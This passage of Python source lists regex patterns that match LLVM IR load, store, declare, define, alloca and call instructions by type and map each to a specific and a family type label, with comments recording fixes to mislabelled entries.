['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128\*>, .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80\*>, .*', '<d x float*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float\*>, .*', '<d x float*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double\*>, .*', '<d x double*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
# Fix copy-paste tag: <d x i24>* loads were labeled '<d x i16>* operation'.
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24>\*, .*', '<d x i24>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40>\*, .*', '<d x i40>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128>\*, .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>\*, .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>\*, .*', '<d x structure>* operation',
'<d x structure>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>\*\*, .*', '<d x float>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>\*\*, .*', '<d x float>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>\*\*, .*', '<d x double>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>\*\*, .*', '<d x structure>** operation',
'<d x structure>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
# Fix copy-paste tag: [d x i24] loads were labeled '[d x i16] operation'.
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i24\], .*', '[d x i24] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i40\], .*', '[d x i40] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x x86_fp80\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x float\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x double\], .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\], .*', '[d x structure] operation',
'[d x structure] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i1\]\*, .*', '[d x i1]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i2\]\*, .*', '[d x i2]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i4\]\*, .*', '[d x i4]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i8\]\*, .*', '[d x i8]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i16\]\*, .*', '[d x i16]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i32\]\*, .*', '[d x i32]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i40\]\*, .*', '[d x i40]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i64\]\*, .*', '[d x i64]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i128\]\*, .*', '[d x i128]* operation', '[d x int]* operation'],
# Fix family labels for array-pointer loads: the family tag was missing the
# trailing '*' (and the [d x { .* }]* entry was wrongly put in the
# floating-point family instead of the structure family).
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x x86_fp80\]\*, .*', '[d x float]* operation',
'[d x floating point]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x float\]\*, .*', '[d x float]* operation',
'[d x floating point]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x double\]\*, .*', '[d x double]* operation',
'[d x floating point]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\]\*, .*', '[d x structure]* operation',
'[d x structure]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?.*\(.*\)\*+, .*', 'function operation', 'function operation'],
['store ' + any_of(opt_load) + '?i1 .*', 'i1 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i2 .*', 'i2 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i4 .*', 'i4 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i8 .*', 'i8 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i16 .*', 'i16 operation', 'int operation'],
# Fix copy-paste tag: i24 stores were labeled 'i16 operation'.
['store ' + any_of(opt_load) + '?i24 .*', 'i24 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i32 .*', 'i32 operation', 'int operation'],
# Fix copy-paste tag: i40 stores were labeled 'i32 operation'.
['store ' + any_of(opt_load) + '?i40 .*', 'i40 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i64 .*', 'i64 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i128 .*', 'i128 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i1\* .*', 'i1* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i2\* .*', 'i2* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i4\* .*', 'i4* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i8\* .*', 'i8* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i16\* .*', 'i16* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i32\* .*', 'i32* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i64\* .*', 'i64* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i128\* .*', 'i128* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i1\*\* .*', 'i1** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i2\*\* .*', 'i2** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i4\*\* .*', 'i4** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i8\*\* .*', 'i8** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i16\*\* .*', 'i16** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i32\*\* .*', 'i32** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i64\*\* .*', 'i64** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i128\*\* .*', 'i128** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?x86_fp80 .*', 'float operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?float .*', 'float operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?double .*', 'double operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?float\* .*', 'float* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?double\* .*', 'double* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?float\*\* .*', 'float** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?double\*\* .*', 'double** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?void \(.*', 'function op', 'function op'],
['store ' + any_of(opt_load) + '?%".*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<%.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<?{.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?opaque.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}> .*', '<d x \{ .* \}> operation', '<d x \{ .* \}> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80\*> .*', '<d x float*> operation',
'<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x double\*> .*', '<d x double*> operation',
'<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}\*> .*', '<d x \{ .* \}*> operation', '<d x \{ .* \}*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}\*?>\* .*', '<d x struct>* operation', '<d x \{ .* \}>* operation'],
# Close the unterminated '<d x function' bracket in the family label.
['store ' + any_of(opt_load) + '?<\d+ x void \(.*', '<d x function>* operation', '<d x function> operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x x86_fp80\] .*', '[d x float] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\] .*', '[d x structure] operation', '[d x structure] operation'],
['declare (noalias |nonnull )*void .*', 'void operation', 'void operation'],
['declare (noalias |nonnull )*i1 .*', 'i1 operation', 'int operation'],
['declare (noalias |nonnull )*i2 .*', 'i2 operation', 'int operation'],
['declare (noalias |nonnull )*i4 .*', 'i4 operation', 'int operation'],
['declare (noalias |nonnull )*i8 .*', 'i8 operation', 'int operation'],
['declare (noalias |nonnull )*i16 .*', 'i16 operation', 'int operation'],
['declare (noalias |nonnull )*i32 .*', 'i32 operation', 'int operation'],
['declare (noalias |nonnull )*i64 .*', 'i64 operation', 'int operation'],
['declare (noalias |nonnull )*i8\* .*', 'i8* operation', 'int* operation'],
['declare (noalias |nonnull )*i16\* .*', 'i16* operation', 'int* operation'],
['declare (noalias |nonnull )*i32\* .*', 'i32* operation', 'int* operation'],
['declare (noalias |nonnull )*i64\* .*', 'i64* operation', 'int* operation'],
['declare (noalias |nonnull )*x86_fp80 .*', 'float operation', 'floating point operation'],
['declare (noalias |nonnull )*float .*', 'float operation', 'floating point operation'],
['declare (noalias |nonnull )*double .*', 'double operation', 'floating point operation'],
['declare (noalias |nonnull )*x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['declare (noalias |nonnull )*float\* .*', 'float* operation', 'floating point* operation'],
['declare (noalias |nonnull )*double\* .*', 'double* operation', 'floating point* operation'],
['declare (noalias |nonnull )*%".*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<%.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<?{.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*opaque.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x x86_fp80>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*<\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*<\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x x86_fp80\] .*', '[d x float] operation', '[d x floating point] operation'],
['declare (noalias |nonnull )*\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['declare (noalias |nonnull )*\[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
['define ' + any_of(opt_define) + '+void .*', 'void operation', 'void operation'],
['define ' + any_of(opt_define) + '+i1 .*', 'i1 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i2 .*', 'i2 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i4 .*', 'i4 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i8 .*', 'i8 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i16 .*', 'i16 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i32 .*', 'i32 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i64 .*', 'i64 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i128 .*', 'i128 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i1\* .*', 'i1* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i2\* .*', 'i2* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i4\* .*', 'i4* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i8\* .*', 'i8* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i16\* .*', 'i16* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i32\* .*', 'i32* operation', 'int* operation'],
# TODO***********************************************************************************0
['store ' + any_of(opt_load) + '?float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['store ' + any_of(opt_load) + '?float\*\*\*\* .*', 'float**** operation', 'floating point**** operation'],
['define ' + any_of(opt_define) + '+i32\*\* .*', 'i32** operation', 'int** operation'],
['define ' + any_of(opt_define) + '+i32\*\*\* .*', 'i32*** operation', 'int*** operation'],
['define ' + any_of(opt_define) + '+i32\*\*\*\* .*', 'i32**** operation', 'int**** operation'],
['define ' + any_of(opt_define) + '+float\*\* .*', 'float** operation', 'floating point** operation'],
['define ' + any_of(opt_define) + '+float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['define ' + any_of(opt_define) + '+float\*\*\*\* .*', 'float**** operation', 'floating point**** operation'],
['<%ID> = alloca i1\*\*($|,).*', 'i1** operation', 'int** operation'],
['<%ID> = alloca i2\*\*($|,).*', 'i2** operation', 'int** operation'],
['<%ID> = alloca i4\*\*($|,).*', 'i4** operation', 'int** operation'],
['<%ID> = alloca i8\*\*($|,).*', 'i8** operation', 'int** operation'],
['<%ID> = alloca i16\*\*($|,).*', 'i16** operation', 'int** operation'],
['<%ID> = alloca i32\*\*($|,).*', 'i32** operation', 'int** operation'],
['<%ID> = alloca i64\*\*($|,).*', 'i64** operation', 'int** operation'],
['<%ID> = alloca i128\*\*($|,).*', 'i128** operation', 'int** operation'],
['<%ID> = alloca i1\*\*\*($|,).*', 'i1*** operation', 'int*** operation'],
['<%ID> = alloca i2\*\*\*($|,).*', 'i2*** operation', 'int*** operation'],
['<%ID> = alloca i4\*\*\*($|,).*', 'i4*** operation', 'int*** operation'],
['<%ID> = alloca i8\*\*\*($|,).*', 'i8*** operation', 'int*** operation'],
['<%ID> = alloca i16\*\*\*($|,).*', 'i16*** operation', 'int*** operation'],
['<%ID> = alloca i32\*\*\*($|,).*', 'i32*** operation', 'int*** operation'],
['<%ID> = alloca i64\*\*\*($|,).*', 'i64*** operation', 'int*** operation'],
['<%ID> = alloca i128\*\*\*($|,).*', 'i128*** operation', 'int*** operation'],
# Fix copy-paste tags: the '**' alloca patterns were labeled with three stars.
# (Compare the double** entry below, which correctly uses 'double** operation'.)
['<%ID> = alloca x86_fp80\*\*($|,).*', 'float** operation', 'floating point** operation'],
['<%ID> = alloca float\*\*($|,).*', 'float** operation', 'floating point** operation'],
['<%ID> = alloca x86_fp80\*\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca float\*\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca double\*\*($|,).*', 'double** operation', 'floating point** operation'],
['<%ID> = alloca double\*\*\*($|,).*', 'double*** operation', 'floating point*** operation'],
# ***********************************************************************************1
['define ' + any_of(opt_define) + '+i64\* .*', 'i64* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i128\* .*', 'i128* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+x86_fp80 .*', 'float operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+float .*', 'float operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+double .*', 'double operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+float\* .*', 'float* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+double\* .*', 'double* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+%".*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<%.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<?{.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+opaque.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x x86_fp80> .*', '<d x float> operation',
'<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x x86_fp80>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x float>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x x86_fp80\] .*', '[d x float] operation',
'[d x floating point] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x double\] .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1 .*', 'i1 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2 .*', 'i2 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4 .*', 'i4 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8 .*', 'i8 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16 .*', 'i16 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32 .*', 'i32 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64 .*', 'i64 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128 .*', 'i128 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8\* .*', 'i8* operation', 'int* operation'],
